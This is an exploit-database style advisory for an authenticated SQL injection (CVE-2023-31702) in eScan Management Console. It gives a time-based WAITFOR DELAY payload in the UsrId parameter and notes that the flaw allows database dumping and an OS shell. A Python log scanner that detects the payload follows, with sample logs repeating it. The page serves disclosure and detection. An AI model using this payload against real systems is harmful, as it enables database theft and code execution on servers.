eScan Management Console 14.0.1400.2281 SQL Injection
eScan Management Console version 14.0.1400.2281 suffers from a remote SQL injection vulnerability.
# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702

*Steps of Reproduction / Proof of Concept (PoC)*

1. Log in to the eScan management console with a valid username and password as root user.

2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176

3. Inject the payload into the UsrId parameter to confirm the SQL injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176

4. The time delay of 5 seconds confirmed that the "UsrId" parameter was vulnerable to SQL injection. Furthermore, it was also possible to dump all the databases and inject an OS shell directly into the MS SQL Server using the SQLMap tool.
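A detection check for the request pattern in the PoC, as an added example that is not part of the original advisory or the vendor's code: it scans web access-log lines for requests to GetUserCurrentPwd whose UsrId or cnt value is not a plain integer. The combined-log line format, the sample lines, and the assumption that both parameters are always integers (as in the benign URL from step 2) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint and parameter names come from the advisory; compared case-insensitively.
ENDPOINT = "/ewconsole/ewconsole.dll/getusercurrentpwd"
INT_PARAMS = ("usrid", "cnt")  # assumption: both are plain integers in normal use
# Lazy match so a request target containing raw (unencoded) spaces is still captured.
REQ_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return {param: decoded value} for integer parameters carrying non-digit data."""
    parts = urlsplit(target)
    if parts.path.lower() != ENDPOINT:
        return {}
    bad = {}
    # Split on '&' only, so a ';' inside a value stays part of that value.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %xx and '+' before validating
        if name.lower() in INT_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            bad[name] = value
    return bad

def scan(lines):
    """Return [(line_number, {param: value})] for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        bad = suspicious_params(m.group(1)) if m else {}
        if bad:
            hits.append((n, bad))
    return hits

# Constructed sample log (documentation IP ranges); payload is the one from step 3.
_P = "/ewconsole/ewconsole.dll/GetUserCurrentPwd"
SAMPLE_LOG = [
    f'203.0.113.7 - - [16/May/2023:10:01:02 +0000] "GET {_P}?UsrId=1&cnt=4176 HTTP/1.1" 200 312',
    f'203.0.113.7 - - [16/May/2023:10:01:09 +0000] "GET {_P}'
    '?UsrId=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&cnt=4176 HTTP/1.1" 200 312',
    f'203.0.113.7 - - [16/May/2023:10:01:20 +0000] "GET {_P}'
    "?usrid=1;WAITFOR DELAY '0:0:5'--&cnt=4176 HTTP/1.1\" 200 312",
    '198.51.100.4 - - [16/May/2023:10:02:00 +0000] "GET /index.html?UsrId=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line_no, params in scan(SAMPLE_LOG):
        print(f"line {line_no}: non-integer value in {params}")
```

Correlating flagged requests with response times close to the injected delay helps separate probing from successful injection.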
Related news
CVE-2023-31702: CVE-2023-31702/README.md at main · sahiloj/CVE-2023-31702
SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1.